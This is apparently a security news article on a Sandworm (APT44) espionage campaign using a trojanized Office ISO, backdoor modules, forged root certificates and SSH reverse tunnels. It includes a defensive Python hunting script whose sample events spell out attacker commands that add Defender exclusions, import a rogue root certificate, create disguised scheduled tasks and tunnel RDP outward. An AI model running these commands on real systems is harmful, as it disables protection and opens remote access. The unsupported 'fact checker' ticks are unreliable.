Sandworm Strikes Again: APT-C-13’s Stealth Cyberespionage Against Critical Networks

The notorious cyberespionage group APT-C-13, also known as Sandworm or APT44, has escalated its attacks on defense, critical infrastructure, and government networks. Unlike their historically destructive campaigns that relied on wiper malware and overt disruption, the group has shifted to a patient, stealth-driven approach. Between 2024 and 2026, Sandworm has been quietly infiltrating high-value networks, maintaining long-term persistence, and conducting deep intelligence-gathering operations.

Their latest operations employ a sophisticated, modular malware framework designed to bypass firewalls, hijack Remote Desktop Protocol (RDP) servers, and establish hidden control channels. Using carefully crafted malware packages and advanced trust manipulation, Sandworm demonstrates the kind of operational patience and technical prowess typically associated with nation-state-level actors.

Malicious ISOs and Stealthy Deployment

The attack chain begins with a malicious ISO file disguised as a pirated copy of Microsoft Office (Microsoft.Office.2025×64.v2025.iso). Distributed primarily through Telegram channels in Ukrainian software-cracking communities, the ISO contains trojanized executables disguised as legitimate installers. Once executed, the malware drops its first-stage payloads, laying the groundwork for deeper infiltration.

Following initial compromise, Sandworm deploys a suite of custom backdoor modules: Tambur, Kalambur, and Sumbur. The Tambur module establishes persistence by creating scheduled tasks disguised as legitimate Windows Diagnostic Infrastructure (WDI) processes. Through encrypted SSH reverse tunnels, the attackers map internal RDP services to external command-and-control (C2) servers, gaining unrestricted remote access.

Evasion Tactics and Trust Chain Exploitation

To avoid detection, Sandworm employs DemiMur, a module that manipulates the operating system’s trust architecture by forcibly importing a forged root certificate (DemiMurCA.crt). This enables malicious scripts to be signed and executed as trusted files, bypassing Windows security measures.

The malware also actively disables endpoint protections. Native PowerShell commands are used to add entire drives, temporary folders, and critical PowerShell paths to Windows Defender exclusion lists. This ensures the malware executes silently without triggering alerts.

Anti-Forensics and Operational Stealth

Sandworm’s operations prioritize anti-forensics. Modules rely on in-memory execution, self-deleting scripts, and timed cleanup routines to erase logs and temporary files. Their C2 infrastructure uses mocking domain names, such as dontgivefuck.com for payload delivery and dontgivedamn.com for SSH tunneling, so that delivery and control stay within a self-contained, attacker-operated environment.

By weaponizing legitimate tools like Tor, OpenSSH, and Weixin scheduled tasks, Sandworm maintains a long-term parasitic presence in targeted networks, making detection and mitigation extremely challenging. Organizations are strongly advised to monitor internal SSH and RDP traffic, audit scheduled tasks, and strictly control software installation from unverified sources.
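The monitoring advice above can be turned into concrete hunting logic. The following Python script is an added illustration, not code from the original report or from any vendor tool: it runs four rules over constructed process-creation events covering the behaviours the article describes (broad Defender exclusions, root-store certificate imports, WDI-lookalike scheduled tasks, and SSH reverse tunnels to RDP). Hostnames, file paths, the task name and the 203.0.113.10 address are made up for the example.

```python
import re

# Constructed sample process-creation events in "host|image|command line" form.
# They are illustrative stand-ins, not telemetry from the original report.
SAMPLE_EVENTS = r"""
ws01|powershell.exe|powershell -c Add-MpPreference -ExclusionPath C:\
ws01|powershell.exe|powershell -c Add-MpPreference -ExclusionPath C:\Users\u\AppData\Local\Temp
ws01|certutil.exe|certutil -addstore root C:\Users\u\AppData\Local\Temp\DemiMurCA.crt
ws01|schtasks.exe|schtasks /create /tn "\Microsoft\Windows\WDI\ResolutionHost" /tr C:\Users\u\AppData\Local\Temp\upd.exe /sc onlogon
ws01|ssh.exe|ssh -N -R 0.0.0.0:50022:127.0.0.1:3389 tunnel@203.0.113.10
ws02|schtasks.exe|schtasks /create /tn "\Backup\Nightly" /tr C:\Windows\System32\wbadmin.exe /sc daily
""".strip().splitlines()

def broad_defender_exclusion(cmd):
    """Defender exclusion covering a whole drive, a Temp folder or a PowerShell path."""
    m = re.search(r"Add-MpPreference\s+-Exclusion(?:Path|Process)\s+['\"]?([^\s'\"]+)", cmd, re.I)
    if not m:
        return False
    path = m.group(1)
    return bool(re.fullmatch(r"[A-Za-z]:\\?", path) or re.search(r"\\(?:Temp|PowerShell)\b", path, re.I))

def root_store_import(cmd):
    """Certificate added to the machine Root store via certutil or PowerShell."""
    return bool(re.search(r"-addstore\s+(?:-f\s+)?['\"]?root\b|Cert:\\LocalMachine\\Root", cmd, re.I))

def wdi_lookalike_task(cmd):
    """Task named after WDI whose action runs from outside the Windows directory."""
    tn = re.search(r'/tn\s+"?([^"]+?)"?\s+/', cmd, re.I)
    tr = re.search(r'/tr\s+"?([^"\s]+)', cmd, re.I)
    if not (tn and tr):
        return False
    return "wdi" in tn.group(1).lower() and not tr.group(1).lower().startswith("c:\\windows\\")

def ssh_reverse_rdp(cmd):
    """OpenSSH reverse tunnel (-R) that exposes the local RDP port 3389."""
    return bool(re.search(r"\bssh(?:\.exe)?\b.*\s-R\s+\S*:3389\b", cmd, re.I))

RULES = (("defender_exclusion_broad", broad_defender_exclusion),
         ("root_cert_import", root_store_import),
         ("wdi_lookalike_task", wdi_lookalike_task), ("ssh_reverse_rdp", ssh_reverse_rdp))

def hunt(events):
    """Return (host, rule, command) for every event that trips a rule."""
    hits = []
    for line in events:
        host, _image, cmd = line.split("|", 2)
        hits += [(host, name, cmd) for name, rule in RULES if rule(cmd)]
    return hits

for host, name, cmd in hunt(SAMPLE_EVENTS):
    print(f"[{host}] {name}: {cmd}")
```

Tuning the path and task-name heuristics to your own baseline (legitimate WDI tasks run from under C:\Windows) is what keeps the rules from firing on routine administration.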

What Undercode Say:

Sandworm’s latest campaign reflects a strategic evolution in APT operations. No longer content with immediate disruption, they are embedding themselves within target networks to extract intelligence over months or even years. The modular malware design demonstrates advanced foresight: each component has a specialized role, from persistence (Tambur) to trust manipulation (DemiMur) to anti-forensics (Sumbur).

The use of forged root certificates and manipulation of Windows trust chains is particularly concerning. It effectively turns the victim’s operating system into a blind execution platform for malicious scripts. Coupled with the aggressive disabling of antivirus defenses, this gives Sandworm free rein to move laterally and harvest sensitive information without triggering standard endpoint alerts.

Their choice of distribution channel, pirated software circulated on Telegram, exemplifies a calculated approach: they exploit human trust in familiar tools to bypass initial security layers. Once inside, the combination of encrypted SSH tunnels and innocuous-looking domain names lets the C2 communications blend into normal network traffic, making detection extremely difficult.

The campaign also highlights a trend among nation-state-backed APTs: intelligence-first attacks. Instead of mass disruption, these actors are investing in long-term observation and strategic infiltration. This aligns with the increasing global emphasis on cyberespionage over cyberwarfare, targeting defense contractors, government agencies, and critical infrastructure to gain geopolitical leverage.

From a defensive perspective, organizations cannot rely solely on signature-based detection. Monitoring unusual RDP and SSH activity, auditing scheduled tasks, and enforcing strict software installation policies are critical. The inclusion of anti-forensic measures like memory-only execution and log-cleaning scripts means traditional forensic methods must evolve to identify subtle anomalies in network behavior.

Ultimately, Sandworm’s latest operations underline the dangerous sophistication of modern APTs: they combine technical mastery with patient, human-centric exploitation strategies, ensuring persistence and intelligence extraction without leaving overt traces. Cyber defenders must now operate with the mindset that attackers are already inside, and the battle is about detection and containment rather than prevention alone.

Fact Checker Results

✅ Sandworm has indeed shifted from destructive to intelligence-driven attacks.
✅ The use of malicious ISO files and Trojanized executables matches observed attack patterns.
✅ Modules like Tambur, Kalambur, Sumbur, and DemiMur are consistent with known APT-C-13 toolsets.

Prediction

📌 Expect Sandworm to continue refining stealth operations, increasingly leveraging legitimate system tools for persistence.
📌 RDP and SSH monitoring will become a primary defensive focus for high-value networks.
📌 Future campaigns may integrate AI-based reconnaissance to further evade detection and automate intelligence extraction.


References:

Reported By: cyberpress.org